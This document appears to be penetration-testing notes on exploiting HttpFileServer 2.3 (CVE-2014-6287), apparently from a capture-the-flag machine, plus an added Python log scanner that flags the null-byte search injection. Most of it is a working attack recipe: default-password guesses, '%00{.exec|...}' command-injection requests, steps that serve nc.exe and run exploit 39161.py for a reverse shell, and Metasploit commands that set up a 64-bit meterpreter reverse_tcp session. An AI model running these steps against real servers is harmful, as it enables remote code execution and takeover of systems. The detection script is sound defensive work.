HttpFileServer (HFS)

Basics

  • Webserver designed for publishing and sharing files

  • Developed by Rejetto

http://10.x.x.x .. Port 80 HttpFileServer (HFS 2.3)

Password Guessing

admin:admin 
admin:password 
root:password 
root:root 
admin:fileserver

HFS 2.3 Remote Command Execution (RCE)

  • HFS 2.3 is vulnerable to remote code execution attacks

  • Cause: a poor regex in the file ParserLib.pas

  • A %00 (null byte) sequence in a search action allows arbitrary programs to be executed

  • The null byte terminates the regular expression but not the entire string

  • HFS has settings to secure against searching with the characters { } . |

Explore HFS

GET /?search=%00 HTTP/1.1                            ..original
GET /?search=%00{.exec|ping 10.10.10.14 HTTP/1.1     ..ping
GET /?search=%00{.exec|ping 10.10.10.14.} HTTP/1.1   ..better

tcpdump -i tun0                                      ..confirm pings
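
Detection side of the requests above, as an added example (not part of the original notes and not HFS or Metasploit code): a log scan that decodes the search parameter and flags a null byte followed by the {. macro opener. The Apache-style log format, the function names and the sample lines are assumptions.

```python
import re
from urllib.parse import unquote_to_bytes

# Request line inside an access-log entry: "METHOD target HTTP/x.y".
# The target is matched lazily because the requests above contain raw spaces.
REQUEST_RE = re.compile(r'"[A-Z]+ (.+?) HTTP/\d\.\d"')

def classify_search(target):
    """Classify the 'search' parameter of one request target, or return None."""
    best = None
    for pair in target.partition("?")[2].split("&"):
        name, _, raw = pair.partition("=")
        if name.lower() != "search":
            continue
        value = unquote_to_bytes(raw)      # decode first: %00 -> b"\x00"
        nul = value.find(b"\x00")
        if nul >= 0 and b"{." in value[nul:]:
            return "null-byte+macro"       # null byte followed by "{." macro opener
        if nul >= 0:
            best = "null-byte"             # bare probe such as search=%00
        elif b"{." in value and best is None:
            best = "macro"                 # macro opener with no null byte
    return best

def scan(lines):
    """Return (line number, client, verdict) for every suspicious log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        verdict = classify_search(match.group(1)) if match else None
        if verdict:
            hits.append((number, line.split()[0], verdict))
    return hits

# Constructed sample log (not captured traffic); clients use documentation addresses.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /?search=report HTTP/1.1" 200 5120',
    '192.0.2.77 - - [01/Jan/2024:10:00:05 +0000] "GET /?search=%00 HTTP/1.1" 200 4980',
    '192.0.2.77 - - [01/Jan/2024:10:00:09 +0000] "GET /?search=%00{.exec|ping 10.10.10.14.} HTTP/1.1" 200 4980',
    '192.0.2.77 - - [01/Jan/2024:10:00:12 +0000] "GET /?search=%00{.exec|ping%2010.10.10.14.} HTTP/1.1" 200 4980',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The parameter is percent-decoded before matching, so the last sample line, which has its space encoded as %20, gets the same verdict as the raw request.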

Easy Exploit (no msf)

searchsploit rejetto

vim 39161.py                   ..fix localip/port
cp nc.exe .                    ..prep payload
python -m SimpleHTTPServer 80  ..share
http://$MyIP:80/nc.exe         ..confirm path
python 39161.py <IP> <Port>    ..method
python 39161.py 10.x.x.x 80    ..exploit (try 4x)
nc -nvlp 4444                  ..listen

Rejetto v2.3 RCE - Metasploit

  • rejetto_hfs_exec

  • CVE-2014-6287

--------------------
Google
httpfileserver vulnerability
httpfileserver metasploit
httpfileserver CVE

Found... "Remote Code Execution", Rejetto, CVE-2014-6287

--------------------
Metasploit
> searchsploit HTTPFileServer   .. nothing
> searchsploit HFS              .. Rejetto HTTP v2.3

> msfconsole
> search rejetto
> use exploit/windows/http/rejetto_hfs_exec
> show options
> set RHOST $IP
> set LHOST $MyIP
> set SRVHOST $MyIP
> set LPORT 5555
> run

Meterpreter 64

  • Session is 32 bit, but Server is 64

  • Set a new Payload

> sysinfo
Computer: OPTIMUM
OS: Windows 2012 R2
Arch: x64                        ..64 bit
Meterpreter: x86/Windows         ..32 bit

> background
msf> show options
msf> set payload windows/x64/meterpreter/reverse_tcp     ..new Payload
msf> set LPORT 51001                                     ..new Port
msf> run                                                 ..connected!
